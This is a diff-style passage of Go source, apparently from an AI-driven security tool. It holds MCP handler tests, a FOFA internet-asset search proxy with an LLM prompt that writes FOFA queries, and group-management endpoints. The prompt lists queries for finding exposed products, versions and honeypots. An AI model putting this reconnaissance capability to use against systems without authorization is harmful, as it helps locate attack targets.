t.Errorf("期望停用数为1,实际%d", int(stats["disabled"].(float64)))
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_StartStopExternalMCP(t *testing.T) {
|
||||
router, handler, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
// 添加一个禁用的配置
|
||||
handler.manager.AddOrUpdateConfig("test-start-stop", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
})
|
||||
|
||||
// 测试启动(可能会失败,因为没有真实的服务器)
|
||||
req := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/start", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
// 启动可能会失败,但应该返回合理的状态码
|
||||
if w.Code != http.StatusOK {
|
||||
// 如果启动失败,应该是400或500
|
||||
if w.Code != http.StatusBadRequest && w.Code != http.StatusInternalServerError {
|
||||
t.Errorf("期望状态码200/400/500,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
// 测试停止
|
||||
req2 := httptest.NewRequest("POST", "/api/external-mcp/test-start-stop/stop", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Errorf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_GetExternalMCP_NotFound(t *testing.T) {
|
||||
router, _, _ := setupTestRouter()
|
||||
|
||||
req := httptest.NewRequest("GET", "/api/external-mcp/nonexistent", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusNotFound {
|
||||
t.Errorf("期望状态码404,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_DeleteExternalMCP_NotFound(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
req := httptest.NewRequest("DELETE", "/api/external-mcp/nonexistent", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
// 删除不存在的配置可能返回200(幂等操作)或404,都是合理的
|
||||
if w.Code != http.StatusNotFound && w.Code != http.StatusOK {
|
||||
t.Errorf("期望状态码404或200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_EmptyName(t *testing.T) {
|
||||
router, _, _ := setupTestRouter()
|
||||
|
||||
configObj := config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
ExternalMCPEnable: true,
|
||||
}
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
// 空名称应该返回404或400
|
||||
if w.Code != http.StatusNotFound && w.Code != http.StatusBadRequest {
|
||||
t.Errorf("期望状态码404或400,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidJSON(t *testing.T) {
|
||||
router, _, _ := setupTestRouter()
|
||||
|
||||
// 发送无效的JSON
|
||||
body := []byte(`{"config": invalid json}`)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusBadRequest {
|
||||
t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_UpdateExistingConfig(t *testing.T) {
|
||||
router, handler, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
// 先添加配置
|
||||
config1 := config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
ExternalMCPEnable: true,
|
||||
}
|
||||
handler.manager.AddOrUpdateConfig("test-update", config1)
|
||||
|
||||
// 更新配置
|
||||
config2 := config.ExternalMCPServerConfig{
|
||||
URL: "http://127.0.0.1:8081/mcp",
|
||||
ExternalMCPEnable: true,
|
||||
}
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: config2,
|
||||
}
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-update", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
// 验证配置已更新
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-update", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
|
||||
var response ExternalMCPResponse
|
||||
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
if response.Config.URL != "http://127.0.0.1:8081/mcp" {
|
||||
t.Errorf("期望url为'http://127.0.0.1:8081/mcp',实际%s", response.Config.URL)
|
||||
}
|
||||
if response.Config.Command != "" {
|
||||
t.Errorf("期望command为空,实际%s", response.Config.Command)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,467 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
openaiClient "cyberstrike-ai/internal/openai"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
type FofaHandler struct {
|
||||
cfg *config.Config
|
||||
logger *zap.Logger
|
||||
client *http.Client
|
||||
openAIClient *openaiClient.Client
|
||||
}
|
||||
|
||||
func NewFofaHandler(cfg *config.Config, logger *zap.Logger) *FofaHandler {
|
||||
// LLM 请求通常比 FOFA 查询更慢一点,单独给一个更宽松的超时。
|
||||
llmHTTPClient := &http.Client{Timeout: 2 * time.Minute}
|
||||
var llmCfg *config.OpenAIConfig
|
||||
if cfg != nil {
|
||||
llmCfg = &cfg.OpenAI
|
||||
}
|
||||
return &FofaHandler{
|
||||
cfg: cfg,
|
||||
logger: logger,
|
||||
client: &http.Client{Timeout: 30 * time.Second},
|
||||
openAIClient: openaiClient.NewClient(llmCfg, llmHTTPClient, logger),
|
||||
}
|
||||
}
|
||||
|
||||
type fofaSearchRequest struct {
|
||||
Query string `json:"query" binding:"required"`
|
||||
Size int `json:"size,omitempty"`
|
||||
Page int `json:"page,omitempty"`
|
||||
Fields string `json:"fields,omitempty"`
|
||||
Full bool `json:"full,omitempty"`
|
||||
}
|
||||
|
||||
type fofaParseRequest struct {
|
||||
Text string `json:"text" binding:"required"`
|
||||
}
|
||||
|
||||
type fofaParseResponse struct {
|
||||
Query string `json:"query"`
|
||||
Explanation string `json:"explanation,omitempty"`
|
||||
Warnings []string `json:"warnings,omitempty"`
|
||||
}
|
||||
|
||||
type fofaAPIResponse struct {
|
||||
Error bool `json:"error"`
|
||||
ErrMsg string `json:"errmsg"`
|
||||
Size int `json:"size"`
|
||||
Page int `json:"page"`
|
||||
Total int `json:"total"`
|
||||
Mode string `json:"mode"`
|
||||
Query string `json:"query"`
|
||||
Results [][]interface{} `json:"results"`
|
||||
}
|
||||
|
||||
type fofaSearchResponse struct {
|
||||
Query string `json:"query"`
|
||||
Size int `json:"size"`
|
||||
Page int `json:"page"`
|
||||
Total int `json:"total"`
|
||||
Fields []string `json:"fields"`
|
||||
ResultsCount int `json:"results_count"`
|
||||
Results []map[string]interface{} `json:"results"`
|
||||
}
|
||||
|
||||
func (h *FofaHandler) resolveCredentials() (email, apiKey string) {
|
||||
// 优先环境变量(便于容器部署),其次配置文件
|
||||
email = strings.TrimSpace(os.Getenv("FOFA_EMAIL"))
|
||||
apiKey = strings.TrimSpace(os.Getenv("FOFA_API_KEY"))
|
||||
if email != "" && apiKey != "" {
|
||||
return email, apiKey
|
||||
}
|
||||
if h.cfg != nil {
|
||||
if email == "" {
|
||||
email = strings.TrimSpace(h.cfg.FOFA.Email)
|
||||
}
|
||||
if apiKey == "" {
|
||||
apiKey = strings.TrimSpace(h.cfg.FOFA.APIKey)
|
||||
}
|
||||
}
|
||||
return email, apiKey
|
||||
}
|
||||
|
||||
func (h *FofaHandler) resolveBaseURL() string {
|
||||
if h.cfg != nil {
|
||||
if v := strings.TrimSpace(h.cfg.FOFA.BaseURL); v != "" {
|
||||
return v
|
||||
}
|
||||
}
|
||||
return "https://fofa.info/api/v1/search/all"
|
||||
}
|
||||
|
||||
// ParseNaturalLanguage 将自然语言解析为 FOFA 查询语法(仅生成,不执行查询)
|
||||
func (h *FofaHandler) ParseNaturalLanguage(c *gin.Context) {
|
||||
var req fofaParseRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
req.Text = strings.TrimSpace(req.Text)
|
||||
if req.Text == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "text 不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.cfg == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "系统配置未初始化"})
|
||||
return
|
||||
}
|
||||
if strings.TrimSpace(h.cfg.OpenAI.APIKey) == "" || strings.TrimSpace(h.cfg.OpenAI.Model) == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{
|
||||
"error": "未配置 AI 模型:请在系统设置中填写 openai.api_key 与 openai.model(支持 OpenAI 兼容 API,如 DeepSeek)",
|
||||
"need": []string{"openai.api_key", "openai.model"},
|
||||
})
|
||||
return
|
||||
}
|
||||
if h.openAIClient == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "AI 客户端未初始化"})
|
||||
return
|
||||
}
|
||||
|
||||
systemPrompt := strings.TrimSpace(`
|
||||
你是“FOFA 查询语法生成器”。任务:把用户输入的自然语言搜索意图,转换成 FOFA 查询语法。
|
||||
|
||||
输出要求(非常重要):
|
||||
1) 只输出 JSON(不要 markdown、不要代码块、不要额外解释文本)
|
||||
2) JSON 结构必须是:
|
||||
{
|
||||
"query": "string,FOFA查询语法(可直接粘贴到 FOFA 或本系统查询框)",
|
||||
"explanation": "string,可选,解释你如何映射字段/逻辑",
|
||||
"warnings": ["string"...] 可选,列出歧义/风险/需要人工确认的点
|
||||
}
|
||||
3) 如果用户输入本身已经是 FOFA 查询语法(或非常接近 FOFA 语法的表达式),应当“原样返回”为 query:
|
||||
- 不要擅自改写字段名、操作符、括号结构
|
||||
- 不要改写任何字符串值(尤其是地理位置类值),不要做缩写/同义词替换/翻译/音译
|
||||
|
||||
查询语法要点(来自 FOFA 语法参考):
|
||||
- 逻辑连接符:&&(与)、||(或),必要时用 () 包住子表达式以确认优先级(括号优先级最高)
|
||||
- 当同一层级同时出现 && 与 ||(混用)时,用 () 明确优先级(避免歧义)
|
||||
- 比较/匹配:
|
||||
- = 匹配;当字段="" 时,可查询“不存在该字段”或“值为空”的情况
|
||||
- == 完全匹配;当字段=="" 时,可查询“字段存在且值为空”的情况
|
||||
- != 不匹配;当字段!="" 时,可查询“值不为空”的情况
|
||||
- *= 模糊匹配;可使用 * 或 ? 进行搜索
|
||||
- 直接输入关键词(不带字段)会在标题、HTML内容、HTTP头、URL字段中搜索;但当意图明确时优先用字段表达(更可控、更准确)
|
||||
|
||||
字段示例速查(来自用户提供的案例,可直接套用/拼接):
|
||||
- 高级搜索操作符示例:
|
||||
- title="beijing" (= 匹配)
|
||||
- title=="" (== 完全匹配,字段存在且值为空)
|
||||
- title="" (= 匹配,可能表示字段不存在或值为空)
|
||||
- title!="" (!= 不匹配,可用于值不为空)
|
||||
- title*="*Home*" (*= 模糊匹配,用 * 或 ?)
|
||||
- (app="Apache" || app="Nginx") && country="CN" (混用 && / || 时用括号)
|
||||
- 基础类(General):
|
||||
- ip="1.1.1.1"
|
||||
- ip="220.181.111.1/24"
|
||||
- ip="2600:9000:202a:2600:18:4ab7:f600:93a1"
|
||||
- port="6379"
|
||||
- domain="qq.com"
|
||||
- host=".fofa.info"
|
||||
- os="centos"
|
||||
- server="Microsoft-IIS/10"
|
||||
- asn="19551"
|
||||
- org="LLC Baxet"
|
||||
- is_domain=true / is_domain=false
|
||||
- is_ipv6=true / is_ipv6=false
|
||||
- 标记类(Special Label):
|
||||
- app="Microsoft-Exchange"
|
||||
- fid="sSXXGNUO2FefBTcCLIT/2Q=="
|
||||
- product="NGINX"
|
||||
- product="Roundcube-Webmail" && product.version="1.6.10"
|
||||
- category="服务"
|
||||
- type="service" / type="subdomain"
|
||||
- cloud_name="Aliyundun"
|
||||
- is_cloud=true / is_cloud=false
|
||||
- is_fraud=true / is_fraud=false
|
||||
- is_honeypot=true / is_honeypot=false
|
||||
- 协议类(type=service):
|
||||
- protocol="quic"
|
||||
- banner="users"
|
||||
- banner_hash="7330105010150477363"
|
||||
- banner_fid="zRpqmn0FXQRjZpH8MjMX55zpMy9SgsW8"
|
||||
- base_protocol="udp" / base_protocol="tcp"
|
||||
- 网站类(type=subdomain):
|
||||
- title="beijing"
|
||||
- header="elastic"
|
||||
- header_hash="1258854265"
|
||||
- body="网络空间测绘"
|
||||
- body_hash="-2090962452"
|
||||
- js_name="js/jquery.js"
|
||||
- js_md5="82ac3f14327a8b7ba49baa208d4eaa15"
|
||||
- cname="customers.spektrix.com"
|
||||
- cname_domain="siteforce.com"
|
||||
- icon_hash="-247388890"
|
||||
- status_code="402"
|
||||
- icp="京ICP证030173号"
|
||||
- sdk_hash="Are3qNnP2Eqn7q5kAoUO3l+w3mgVIytO"
|
||||
- 地理位置(Location):
|
||||
- country="CN" 或 country="中国"
|
||||
- region="Zhejiang" 或 region="浙江"(仅支持中国地区中文)
|
||||
- city="Hangzhou"
|
||||
- 证书类(Certificate):
|
||||
- cert="baidu"
|
||||
- cert.subject="Oracle Corporation"
|
||||
- cert.issuer="DigiCert"
|
||||
- cert.subject.org="Oracle Corporation"
|
||||
- cert.subject.cn="baidu.com"
|
||||
- cert.issuer.org="cPanel, Inc."
|
||||
- cert.issuer.cn="Synology Inc. CA"
|
||||
- cert.domain="huawei.com"
|
||||
- cert.is_equal=true / cert.is_equal=false
|
||||
- cert.is_valid=true / cert.is_valid=false
|
||||
- cert.is_match=true / cert.is_match=false
|
||||
- cert.is_expired=true / cert.is_expired=false
|
||||
- jarm="2ad2ad0002ad2ad22c2ad2ad2ad2ad2eac92ec34bcc0cf7520e97547f83e81"
|
||||
- tls.version="TLS 1.3"
|
||||
- tls.ja3s="15af977ce25de452b96affa2addb1036"
|
||||
- cert.sn="356078156165546797850343536942784588840297"
|
||||
- cert.not_after.after="2025-03-01" / cert.not_after.before="2025-03-01"
|
||||
- cert.not_before.after="2025-03-01" / cert.not_before.before="2025-03-01"
|
||||
- 时间类(Last update time):
|
||||
- after="2023-01-01"
|
||||
- before="2023-12-01"
|
||||
- after="2023-01-01" && before="2023-12-01"
|
||||
- 独立IP语法(需配合 ip_filter / ip_exclude):
|
||||
- ip_filter(banner="SSH-2.0-OpenSSH_6.7p2") && ip_filter(icon_hash="-1057022626")
|
||||
- ip_filter(banner="SSH-2.0-OpenSSH_6.7p2" && asn="3462") && ip_exclude(title="EdgeOS")
|
||||
- port_size="6" / port_size_gt="6" / port_size_lt="12"
|
||||
- ip_ports="80,161"
|
||||
- ip_country="CN"
|
||||
- ip_region="Zhejiang"
|
||||
- ip_city="Hangzhou"
|
||||
- ip_after="2021-03-18"
|
||||
- ip_before="2019-09-09"
|
||||
|
||||
生成约束与注意事项:
|
||||
- 字符串值一律用英文双引号包裹,例如 title="登录"、country="CN"
|
||||
- 字符串值保持字面一致:不要缩写(例如 city="beijing" 不要变成 city="BJ"),不要用别名(例如 Beijing/Peking),不要擅自翻译/音译/改写大小写
|
||||
- 地理位置字段(country/region/city)更倾向于“按用户给定值输出”;不确定合法取值时,不要猜测,把备选写进 warnings
|
||||
- 不要捏造不存在的 FOFA 字段;不确定时把不确定点写进 warnings,并输出一个保守的 query
|
||||
- 当用户描述里有“多个与/或条件”,优先加 () 明确优先级,例如:(app="Apache" || app="Nginx") && country="CN"
|
||||
- 当用户缺少关键条件导致范围过大或歧义(如地点/协议/端口/服务类型未说明),允许 query 为空字符串,并在 warnings 里明确需要补充的信息
|
||||
`)
|
||||
|
||||
userPrompt := fmt.Sprintf("自然语言意图:%s", req.Text)
|
||||
|
||||
requestBody := map[string]interface{}{
|
||||
"model": h.cfg.OpenAI.Model,
|
||||
"messages": []map[string]interface{}{
|
||||
{"role": "system", "content": systemPrompt},
|
||||
{"role": "user", "content": userPrompt},
|
||||
},
|
||||
"temperature": 0.1,
|
||||
"max_completion_tokens": 12000,
|
||||
}
|
||||
|
||||
// OpenAI 返回结构:只需要 choices[0].message.content
|
||||
var apiResponse struct {
|
||||
Choices []struct {
|
||||
Message struct {
|
||||
Content string `json:"content"`
|
||||
} `json:"message"`
|
||||
} `json:"choices"`
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithTimeout(c.Request.Context(), 90*time.Second)
|
||||
defer cancel()
|
||||
|
||||
if err := h.openAIClient.ChatCompletion(ctx, requestBody, &apiResponse); err != nil {
|
||||
var apiErr *openaiClient.APIError
|
||||
if errors.As(err, &apiErr) {
|
||||
h.logger.Warn("FOFA自然语言解析:LLM返回错误", zap.Int("status", apiErr.StatusCode))
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "AI 解析失败(上游返回非 200),请检查模型配置或稍后重试"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "AI 解析失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if len(apiResponse.Choices) == 0 {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "AI 未返回有效结果"})
|
||||
return
|
||||
}
|
||||
|
||||
content := strings.TrimSpace(apiResponse.Choices[0].Message.Content)
|
||||
// 兼容模型偶尔返回 ```json ... ``` 的情况
|
||||
content = strings.TrimPrefix(content, "```json")
|
||||
content = strings.TrimPrefix(content, "```")
|
||||
content = strings.TrimSuffix(content, "```")
|
||||
content = strings.TrimSpace(content)
|
||||
|
||||
var parsed fofaParseResponse
|
||||
if err := json.Unmarshal([]byte(content), &parsed); err != nil {
|
||||
// 直接回传一部分原文,方便排查,但避免太大
|
||||
snippet := content
|
||||
if len(snippet) > 1200 {
|
||||
snippet = snippet[:1200]
|
||||
}
|
||||
c.JSON(http.StatusBadGateway, gin.H{
|
||||
"error": "AI 返回内容无法解析为 JSON,请稍后重试或换个描述方式",
|
||||
"snippet": snippet,
|
||||
})
|
||||
return
|
||||
}
|
||||
parsed.Query = strings.TrimSpace(parsed.Query)
|
||||
if parsed.Query == "" {
|
||||
// query 允许为空(表示需求不明确),但前端需要明确提示
|
||||
if len(parsed.Warnings) == 0 {
|
||||
parsed.Warnings = []string{"需求信息不足,未能生成可用的 FOFA 查询语法,请补充关键条件(如国家/端口/产品/域名等)。"}
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, parsed)
|
||||
}
|
||||
|
||||
// Search FOFA 查询(后端代理,避免前端暴露 key)
|
||||
func (h *FofaHandler) Search(c *gin.Context) {
|
||||
var req fofaSearchRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
req.Query = strings.TrimSpace(req.Query)
|
||||
if req.Query == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "query 不能为空"})
|
||||
return
|
||||
}
|
||||
if req.Size <= 0 {
|
||||
req.Size = 100
|
||||
}
|
||||
if req.Page <= 0 {
|
||||
req.Page = 1
|
||||
}
|
||||
// FOFA 接口 size 上限和账户权限相关,这里只做一个合理的保护
|
||||
if req.Size > 10000 {
|
||||
req.Size = 10000
|
||||
}
|
||||
if req.Fields == "" {
|
||||
req.Fields = "host,ip,port,domain,title,protocol,country,province,city,server"
|
||||
}
|
||||
|
||||
email, apiKey := h.resolveCredentials()
|
||||
if email == "" || apiKey == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{
|
||||
"error": "FOFA 未配置:请在系统设置中填写 FOFA Email/API Key,或设置环境变量 FOFA_EMAIL/FOFA_API_KEY",
|
||||
"need": []string{"fofa.email", "fofa.api_key"},
|
||||
"env_key": []string{"FOFA_EMAIL", "FOFA_API_KEY"},
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
baseURL := h.resolveBaseURL()
|
||||
qb64 := base64.StdEncoding.EncodeToString([]byte(req.Query))
|
||||
|
||||
u, err := url.Parse(baseURL)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "FOFA base_url 无效: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
params := u.Query()
|
||||
params.Set("email", email)
|
||||
params.Set("key", apiKey)
|
||||
params.Set("qbase64", qb64)
|
||||
params.Set("size", fmt.Sprintf("%d", req.Size))
|
||||
params.Set("page", fmt.Sprintf("%d", req.Page))
|
||||
params.Set("fields", strings.TrimSpace(req.Fields))
|
||||
if req.Full {
|
||||
params.Set("full", "true")
|
||||
} else {
|
||||
// 明确传 false,便于排查
|
||||
params.Set("full", "false")
|
||||
}
|
||||
u.RawQuery = params.Encode()
|
||||
|
||||
httpReq, err := http.NewRequestWithContext(c.Request.Context(), http.MethodGet, u.String(), nil)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建请求失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "请求 FOFA 失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": fmt.Sprintf("FOFA 返回非 2xx: %d", resp.StatusCode)})
|
||||
return
|
||||
}
|
||||
|
||||
var apiResp fofaAPIResponse
|
||||
if err := json.NewDecoder(resp.Body).Decode(&apiResp); err != nil {
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": "解析 FOFA 响应失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if apiResp.Error {
|
||||
msg := strings.TrimSpace(apiResp.ErrMsg)
|
||||
if msg == "" {
|
||||
msg = "FOFA 返回错误"
|
||||
}
|
||||
c.JSON(http.StatusBadGateway, gin.H{"error": msg})
|
||||
return
|
||||
}
|
||||
|
||||
fields := splitAndCleanCSV(req.Fields)
|
||||
results := make([]map[string]interface{}, 0, len(apiResp.Results))
|
||||
for _, row := range apiResp.Results {
|
||||
item := make(map[string]interface{}, len(fields))
|
||||
for i, f := range fields {
|
||||
if i < len(row) {
|
||||
item[f] = row[i]
|
||||
} else {
|
||||
item[f] = nil
|
||||
}
|
||||
}
|
||||
results = append(results, item)
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, fofaSearchResponse{
|
||||
Query: req.Query,
|
||||
Size: apiResp.Size,
|
||||
Page: apiResp.Page,
|
||||
Total: apiResp.Total,
|
||||
Fields: fields,
|
||||
ResultsCount: len(results),
|
||||
Results: results,
|
||||
})
|
||||
}
|
||||
|
||||
func splitAndCleanCSV(s string) []string {
|
||||
parts := strings.Split(s, ",")
|
||||
out := make([]string, 0, len(parts))
|
||||
seen := make(map[string]struct{}, len(parts))
|
||||
for _, p := range parts {
|
||||
v := strings.TrimSpace(p)
|
||||
if v == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[v]; ok {
|
||||
continue
|
||||
}
|
||||
seen[v] = struct{}{}
|
||||
out = append(out, v)
|
||||
}
|
||||
return out
|
||||
}
|
||||
@@ -0,0 +1,320 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// GroupHandler 分组处理器
|
||||
type GroupHandler struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewGroupHandler 创建新的分组处理器
|
||||
func NewGroupHandler(db *database.DB, logger *zap.Logger) *GroupHandler {
|
||||
return &GroupHandler{
|
||||
db: db,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// CreateGroupRequest 创建分组请求
|
||||
type CreateGroupRequest struct {
|
||||
Name string `json:"name"`
|
||||
Icon string `json:"icon"`
|
||||
}
|
||||
|
||||
// CreateGroup 创建分组
|
||||
func (h *GroupHandler) CreateGroup(c *gin.Context) {
|
||||
var req CreateGroupRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if req.Name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
group, err := h.db.CreateGroup(req.Name, req.Icon)
|
||||
if err != nil {
|
||||
h.logger.Error("创建分组失败", zap.Error(err))
|
||||
// 如果是名称重复错误,返回400状态码
|
||||
if err.Error() == "分组名称已存在" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称已存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, group)
|
||||
}
|
||||
|
||||
// ListGroups 列出所有分组
|
||||
func (h *GroupHandler) ListGroups(c *gin.Context) {
|
||||
groups, err := h.db.ListGroups()
|
||||
if err != nil {
|
||||
h.logger.Error("获取分组列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, groups)
|
||||
}
|
||||
|
||||
// GetGroup 获取分组
|
||||
func (h *GroupHandler) GetGroup(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
group, err := h.db.GetGroup(id)
|
||||
if err != nil {
|
||||
h.logger.Error("获取分组失败", zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "分组不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, group)
|
||||
}
|
||||
|
||||
// UpdateGroupRequest 更新分组请求
|
||||
type UpdateGroupRequest struct {
|
||||
Name string `json:"name"`
|
||||
Icon string `json:"icon"`
|
||||
}
|
||||
|
||||
// UpdateGroup 更新分组
|
||||
func (h *GroupHandler) UpdateGroup(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
var req UpdateGroupRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if req.Name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.UpdateGroup(id, req.Name, req.Icon); err != nil {
|
||||
h.logger.Error("更新分组失败", zap.Error(err))
|
||||
// 如果是名称重复错误,返回400状态码
|
||||
if err.Error() == "分组名称已存在" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "分组名称已存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
group, err := h.db.GetGroup(id)
|
||||
if err != nil {
|
||||
h.logger.Error("获取更新后的分组失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, group)
|
||||
}
|
||||
|
||||
// DeleteGroup 删除分组
|
||||
func (h *GroupHandler) DeleteGroup(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
if err := h.db.DeleteGroup(id); err != nil {
|
||||
h.logger.Error("删除分组失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
||||
}
|
||||
|
||||
// AddConversationToGroupRequest 添加对话到分组请求
|
||||
type AddConversationToGroupRequest struct {
|
||||
ConversationID string `json:"conversationId"`
|
||||
GroupID string `json:"groupId"`
|
||||
}
|
||||
|
||||
// AddConversationToGroup 将对话添加到分组
|
||||
